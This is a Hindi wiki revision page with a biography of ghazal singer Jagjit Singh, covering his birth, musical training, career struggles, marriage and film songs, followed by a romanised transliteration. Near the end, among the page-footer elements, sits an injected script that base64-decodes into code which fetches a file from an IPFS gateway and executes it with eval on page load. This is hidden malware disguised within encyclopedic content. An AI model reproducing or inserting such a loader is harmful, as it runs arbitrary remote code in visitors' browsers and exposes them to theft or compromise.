Difference between revisions of "जगजीत सिंह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('thumb|जगजीत सिंह|250px जगजीत सिंह (अंग्रेज़ी: ...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
[[चित्र:Jagjit-Singh.jpg|thumb|जगजीत सिंह|250px]]
 
[[चित्र:Jagjit-Singh.jpg|thumb|जगजीत सिंह|250px]]
जगजीत सिंह (अंग्रेज़ी: Jagjit Singh) (जन्म- 8 फ़रवरी, 1941 [[गंगानगर]], [[राजस्थान]] - मृत्यु- 10 अक्टूबर, 2011 [[मुम्बई]], [[महाराष्टृ]]) ग़ज़लों की दुनिया के बादशाह और अपनी सहराना आवाज़ से लाखों-करोड़ों सुनने वालों के दिलों पर राज करने वाले प्रसिद्ध ग़ज़ल गायक थे। खालिस [[उर्दू]] जानने वालों की मिल्कियत समझी जाने वाली.. नवाबों, रक्कासाओं की दुनिया में झनकती और शायरों की महफ़िलों में वाह-वाह की दाद पर इतराती ग़ज़लों को आम आदमी तक पहुंचाने का श्रेय अगर किसी को जाता है तो वह जगजीत सिंह हैं। उनकी ग़ज़लों ने न सिर्फ़ उर्दू के कम जानकारों के बीच शेरो-शायरी की समझ में इज़ाफ़ा किया बल्कि [[ग़ालिब]], [[मीर]], मजाज़, जोश और फ़िराक़ जैसे शायरों से भी उनका परिचय कराया। [[हिंदी]], उर्दू, पंजाबी, भोजपुरी सहित कई जबानों में गाने वाले जगजीत सिंह को साल 2003 में भारत सरकार के सर्वोच्च नागरिक सम्मानों में से एक [[पद्मभूषण]] से नवाज़ा गया है।  
+
जगजीत सिंह (अंग्रेज़ी: Jagjit Singh) (जन्म- 8 फ़रवरी, 1941 [[गंगानगर]], [[राजस्थान]] - मृत्यु- 10 अक्टूबर, 2011 [[मुम्बई]], [[महाराष्ट्र]]) ग़ज़लों की दुनिया के बादशाह और अपनी सहराना आवाज़ से लाखों-करोड़ों सुनने वालों के दिलों पर राज करने वाले प्रसिद्ध ग़ज़ल गायक थे। खालिस [[उर्दू]] जानने वालों की मिल्कियत समझी जाने वाली.. नवाबों, रक्कासाओं की दुनिया में झनकती और शायरों की महफ़िलों में वाह-वाह की दाद पर इतराती ग़ज़लों को आम आदमी तक पहुंचाने का श्रेय अगर किसी को जाता है तो वह जगजीत सिंह हैं। उनकी ग़ज़लों ने न सिर्फ़ उर्दू के कम जानकारों के बीच शेरो-शायरी की समझ में इज़ाफ़ा किया बल्कि [[ग़ालिब]], [[मीर]], मजाज़, जोश और फ़िराक़ जैसे शायरों से भी उनका परिचय कराया। [[हिंदी]], उर्दू, पंजाबी, भोजपुरी सहित कई जबानों में गाने वाले जगजीत सिंह को साल 2003 में भारत सरकार के सर्वोच्च नागरिक सम्मानों में से एक [[पद्मभूषण]] से नवाज़ा गया है।  
 
==जीवन परिचय==
 
==जीवन परिचय==
 
====जन्म====
 
====जन्म====
Line 9: Line 9:
 
बचपन में अपने पिता से संगीत विरासत में मिला। गंगानगर मे ही पंड़ित छगन लाल शर्मा के सानिध्य में दो साल तक शास्त्रीय संगीत सीखने की शुरूआत की। आगे जाकर सैनिया घराने के उस्ताद जमाल ख़ान साहब से ख्याल, ठुमरी और ध्रुपद की बारीकियां सीखीं। पिता की ख़्वाहिश थी कि उनका बेटा भारतीय प्रशासनिक सेवा (आईएएस) में जाए लेकिन जगजीत पर गायक बनने की धुन सवार थी। कुरुक्षेत्र विश्वविद्यालय में पढ़ाई के दौरान संगीत मे उनकी दिलचस्पी देखकर कुलपति प्रोफ़ेसर सूरजभान ने जगजीत सिंह जी को काफ़ी उत्साहित किया। उनके ही कहने पर वे 1965 में [[मुंबई]] आ गए।  
 
बचपन में अपने पिता से संगीत विरासत में मिला। गंगानगर मे ही पंड़ित छगन लाल शर्मा के सानिध्य में दो साल तक शास्त्रीय संगीत सीखने की शुरूआत की। आगे जाकर सैनिया घराने के उस्ताद जमाल ख़ान साहब से ख्याल, ठुमरी और ध्रुपद की बारीकियां सीखीं। पिता की ख़्वाहिश थी कि उनका बेटा भारतीय प्रशासनिक सेवा (आईएएस) में जाए लेकिन जगजीत पर गायक बनने की धुन सवार थी। कुरुक्षेत्र विश्वविद्यालय में पढ़ाई के दौरान संगीत मे उनकी दिलचस्पी देखकर कुलपति प्रोफ़ेसर सूरजभान ने जगजीत सिंह जी को काफ़ी उत्साहित किया। उनके ही कहने पर वे 1965 में [[मुंबई]] आ गए।  
 
====जीवन में संघर्ष====
 
====जीवन में संघर्ष====
वे पेइंग गेस्ट के तौर पर रहा करते थे और विज्ञापनों के लिए जिंगल्स गाकर या शादी-समारोह वगैरह में गाकर रोज़ी रोटी का जुगाड़ करते रहे। यहाँ से संघर्ष का दौर शुरू हुआ। इसके बाद फ़िल्मों में हिट संगीत देने के सारे प्रयास बुरी तरह नाकामयाब रहे। कुछ साल पहले डिंपल कापड़िया और विनोद खन्ना अभिनीत फ़िल्म 'लीला' का संगीत औसत दर्ज़े का रहा। 1994  में ख़ुदाई, 1989 में बिल्लू बादशाह, 1989 में क़ानून की आवाज़, 1987 में राही, 1986 में ज्वाला, 1986 में लौंग दा लश्कारा, 1984 में रावण और 1982 में सितम के गीत चले और न ही फ़िल्में।  
+
वे पेइंग गेस्ट के तौर पर रहा करते थे और विज्ञापनों के लिए जिंगल्स गाकर या शादी-समारोह वगैरह में गाकर रोज़ी रोटी का जुगाड़ करते रहे। यहाँ से संघर्ष का दौर शुरू हुआ। इसके बाद फ़िल्मों में हिट संगीत देने के सारे प्रयास बुरी तरह नाकामयाब रहे। कुछ साल पहले डिंपल कापड़िया और विनोद खन्ना अभिनीत फ़िल्म 'लीला' का संगीत औसत दर्ज़े का रहा। 1994  में ख़ुदाई, 1989 में बिल्लू बादशाह, 1989 में क़ानून की आवाज़, 1987 में राही, 1986 में ज्वाला, 1986 में लौंग दा लश्कारा, 1984 में रावण और 1982 में सितम के गीत चले और न ही फ़िल्में।  
 
====विवाह====
 
====विवाह====
 
1967 में जगजीत जी की मुलाक़ात चित्रा जी से हुई। दो साल बाद दोनों 1969 में परिणय सूत्र में बंध गए।
 
1967 में जगजीत जी की मुलाक़ात चित्रा जी से हुई। दो साल बाद दोनों 1969 में परिणय सूत्र में बंध गए।
Line 34: Line 34:
 
==संबंधित लेख==
 
==संबंधित लेख==
  
[[Category:नया पन्ना अक्टूबर-2011]]
+
[[Category:ग़ज़ल गायक]][[Category:गायक]] [[Category:संगीतकार]][[Category:सिनेमा]][[Category:संगीत कोश]][[Category:कला कोश]]
  
 
__INDEX__
 
__INDEX__
  
 
+
__NOTOC__
 
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
 
 
==बाहरी कड़ियाँ==
 
 
 
==संबंधित लेख==
 
 
 
[[Category:नया पन्ना अक्टूबर-2011]]
 
 
 
__INDEX__
 

Revision as of 08:34, 10 October 2011

thumb|jagajit sianh|250px jagajit sianh (aangrezi: Jagjit Singh) (janm- 8 faravari, 1941 ganganagar, rajasthan - mrityu- 10 aktoobar, 2011 mumbee, maharashtr) gazaloan ki duniya ke badashah aur apani saharana avaz se lakhoan-karo doan sunane valoan ke diloan par raj karane vale prasiddh gazal gayak the. khalis urdoo janane valoan ki milkiyat samajhi jane vali.. navaboan, rakkasaoan ki duniya mean jhanakati aur shayaroan ki mahafiloan mean vah-vah ki dad par itarati gazaloan ko am adami tak pahuanchane ka shrey agar kisi ko jata hai to vah jagajit sianh haian. unaki gazaloan ne n sirf urdoo ke kam janakaroan ke bich shero-shayari ki samajh mean izafa kiya balki galib, mir, majaz, josh aur firaq jaise shayaroan se bhi unaka parichay karaya. hiandi, urdoo, panjabi, bhojapuri sahit kee jabanoan mean gane vale jagajit sianh ko sal 2003 mean bharat sarakar ke sarvochch nagarik sammanoan mean se ek padmabhooshan se navaza gaya hai.

jivan parichay

janm

jagajit ji ka janm 8 faravari, 1941 ko rajasthan ke ganganagar mean hua tha. pita saradar amar sianh dhamani bharat sarakar ke karmachari the. jagajit ji ka parivar moolatah panjab ke rop d zile ke dalla gaanv ka rahane vala hai. maan bachchan kaur panjab ke hi samaralla ke uttalan gaanv ki rahane vali thian. jagajit ka bachapan ka nam jit tha. karo doan sunane valoan ke chalate sianh sahab kuchh hi dashakoan mean jag ko jitane vale jagajit ban ge.

shiksha

shurooati shiksha ganganagar ke khalasa skool mean huee aur bad padhane ke lie jalandhar a ge. dievi k aaulej se snatak ki digri li aur isake bad kurookshetr vishvavidyalay se itihas mean post grejueshan bhi kiya.

sangit ki shuruat

bachapan mean apane pita se sangit virasat mean mila. ganganagar me hi pan dit chhagan lal sharma ke sanidhy mean do sal tak shastriy sangit sikhane ki shurooat ki. age jakar sainiya gharane ke ustad jamal khan sahab se khyal, thumari aur dhrupad ki barikiyaan sikhian. pita ki khvahish thi ki unaka beta bharatiy prashasanik seva (aeeees) mean jae lekin jagajit par gayak banane ki dhun savar thi. kurukshetr vishvavidyalay mean padhaee ke dauran sangit me unaki dilachaspi dekhakar kulapati profesar soorajabhan ne jagajit sianh ji ko kafi utsahit kiya. unake hi kahane par ve 1965 mean muanbee a ge.

jivan mean sangharsh

ve peiang gest ke taur par raha karate the aur vijnapanoan ke lie jiangals gakar ya shadi-samaroh vagairah mean gakar rozi roti ka juga d karate rahe. yahaan se sangharsh ka daur shuroo hua. isake bad filmoan mean hit sangit dene ke sare prayas buri tarah nakamayab rahe. kuchh sal pahale dianpal kap diya aur vinod khanna abhinit film 'lila' ka sangit ausat darze ka raha. 1994 mean khudaee, 1989 mean billoo badashah, 1989 mean qanoon ki avaz, 1987 mean rahi, 1986 mean jvala, 1986 mean lauang da lashkara, 1984 mean ravan aur 1982 mean sitam ke n git chale aur n hi filmean.

vivah

1967 mean jagajit ji ki mulaqat chitra ji se huee. do sal bad donoan 1969 mean parinay sootr mean bandh ge.

filmi jagat

1981 mean raman kumar nirdeshit ‘premagit’ aur 1982 mean mahesh bhatt nirdeshit arth ko bhala kaun bhool sakata hai. arth mean jagajit ji ne hi sangit diya tha. film ka har gana logoan ki zuban par chadh gaya tha. ye sari filmean un dinoan ausat se kam darze ki filmean mani geean. zahir hai ki jagajit sianh ne bataur kamajor bahut pap d bele lekin ve achchhe filmi gane rachane mean asaphal hi rahe. kuchh hit filmi git ye rahe-

  1. ‘premagit’ ka ‘hothoan se chhoo lo tum mera git amar kar do’
  2. ‘khalanayak’ ka ‘o maan tujhe salam’
  3. ‘dushman’ ka ‘chitthi na koee sandesh’
  4. ‘j aaugars park’ ka ‘b di nazuk hai ye manzil’
  5. ‘sath-sath’ ka ‘ye tera ghar, ye mera ghar’ aur ‘pyar mujhase jo kiya tumane’
  6. ‘sarafarosh’ ka ‘hoshavaloan ko khabar kya bekhudi kya chiz hai’
  7. traifik siganal ka ‘hath chhute bhi to rishte nahian chhoota karate’ (filmi varzan)
  8. ‘tum bin’ ka ‘koee farayad tere dil mean dabi ho jaise’
  9. ‘vir zara’ ka ‘tum pas a rahe ho’ (lata ji ke sath)
  10. ‘taraqib’ ka ‘meri aankhoan ne chuna hai tujhako duniya dekhakar’ (alaka yajnik ke sath)


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh